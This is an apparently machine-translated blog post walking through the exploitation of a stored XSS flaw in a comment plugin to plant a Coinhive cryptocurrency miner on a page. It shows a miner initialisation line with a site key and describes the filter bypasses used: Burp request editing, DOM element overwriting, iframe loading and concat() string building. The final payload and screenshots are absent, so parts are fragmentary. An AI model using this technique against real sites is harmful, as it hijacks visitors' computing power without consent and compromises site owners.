the zigzag course of xss mining horse

Posted by lipsius at 2020-03-23


This article was first published in freebuf tidesec:

The target systems mentioned in this paper are all test environments built by local area network, for example, it is a coincidence that IP or URL are identical. The technologies, ideas and tools involved in this article are only for learning and exchange for safety purposes, and no one is allowed to use them for illegal purposes and profit purposes, or the consequences will be borne by themselves!


First, repeat the vulnerability. Now insert XSS code into the input box:

Burp Grab:

It is found that XSS has been filtered in the foreground. Modify the data package:

After the data package is released, refresh the current page:

One storage XSS, but none of the above is important


Since there is such a good chance, can we not try to mine?

First of all, a Monroe account is needed (no more details)

Next, go to coinhive to register an account (not to repeat)

Get JS run script

<script src=></script>


var miner = new CoinHive.Anonymous(’3CZb3wTC2wAsN0kWehZEi8Tclp38uFBo’, {throttle: 0.5});



I thought that the script could be inserted directly. After the result is inserted, 400 errors will be returned directly:

According to the test, this is because the space is not encoded as +.

From the returned packets, we can see that the data we receive is exactly what we want.

But go to the page to see why mom doesn't execute the sales approval.......

Through the review element, it turns out that this comment plug-in automatically adds a tag to the URL address. Now we have to find a way around it.

Tested n cases, found that this URL address can not be bypassed, only to find a way to splice the URL. But now the URL is not inside the script and cannot be spliced with comments or functions.

Let's try dom. Select an ID first, and directly overwrite it.

Let's choose this one. It's good-looking. Now let's try the console:

Here, use + to splice URLs. Check the source code:

Happy ha ha ha ha, now the effect has been achieved, but why didn't the special one run?????

That's probably what it means. OK, let's use another method. You can use iframe to load.

The result is correct this time, but the + we just used to splice the string has turned it into a space.

So, let's use the concat function instead of concatenating strings

The final payload is as follows:



View effect:

To view iframe inserted by Dom:

I'm happy to see CPU utilization


Meet XSS is a variety of winding bar, if you have any better way, you can leave your payload below.

What's more: I heard that dashboard is not working?

How to play after this???

I am a member of the tide security team ( Small partners interested in web security can follow or join us. The tidesec security team: